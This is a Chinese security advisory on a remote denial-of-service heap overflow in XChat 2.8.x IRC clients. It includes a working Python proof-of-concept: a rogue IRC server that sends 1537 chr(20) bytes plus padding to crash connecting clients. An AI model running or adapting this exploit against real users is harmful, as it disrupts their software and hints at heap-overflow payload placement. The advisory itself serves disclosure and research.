X-Chat畸形数据处理远程拒绝服务漏洞

X-Chat畸形数据处理远程拒绝服务漏洞

发布日期：2011-11-25
更新日期：2011-11-29

受影响系统：
XChat XChat 2.8.9
XChat XChat 2.8.7b
XChat XChat 2.8.6
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 50820

X-Chat是一款免费开放源代码的IRC客户端。

X-Chat在实现上存在远程拒绝服务漏洞，远程攻击者可利用此漏洞使应用程序崩溃，导致拒绝服务。

<*来源：th3p4tri0t
  *>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

#!/usr/bin/python

# Exploit Title: XChat Heap Overflow DoS Proof of Concept
# Date: June 2011
# Author: th3p4tri0t
# Software Link: http://xchat.org/
# Version: <= 2.8.9

# This only works on XChat on KDE, I'm not sure about windows.
# It has been tested on Ubuntu (failed), Kubuntu, and Bactrack 5
# It is a heap overflow and is some sort of error with X Windows
# It uses 1537 (this is the minimum) of the ascii value 20
# after this, an unknown number of any other character (did not check for special
# characters) is required to trigger a crash, presumably the payload will go here.

# th3p4tri0t

import socket

print "XChat PoC Exploit by th3p4tri0t\n"

print "Creating server..."
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

print "    [*] Binding to socket..."
sock.bind(('127.0.0.1', 6667))

print "    [*] Listening on socket..."
sock.listen(5)

print "    [*] Accepting connection..."
(target, address) = sock.accept()

print "    [*] Sending payload..."
buffer = "hybrid7.debian.local "
buffer += chr(20) * 1537         # minimum required of this character
buffer += "A"*4000               # anything can go here and it still works.
buffer += " :*\r\n"

target.send(buffer)

target.close
sock.close

建议：
--------------------------------------------------------------------------------
厂商补丁：

XChat
-----
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://xchat.org/